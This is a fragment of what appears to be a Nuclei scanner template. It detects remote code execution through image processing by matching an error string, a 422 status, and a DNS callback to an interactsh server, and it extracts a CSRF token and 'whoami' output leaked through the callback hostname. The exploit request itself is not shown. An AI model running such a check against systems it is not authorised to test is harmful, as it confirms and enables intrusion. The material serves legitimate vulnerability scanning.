|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'Failed to process image'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 422
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrf-token
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'csrf-token" content="(.*?)" />\n\n<meta'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: whoami
|
||||||
|
part: interactsh_request
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
|
Loading…
Reference in New Issue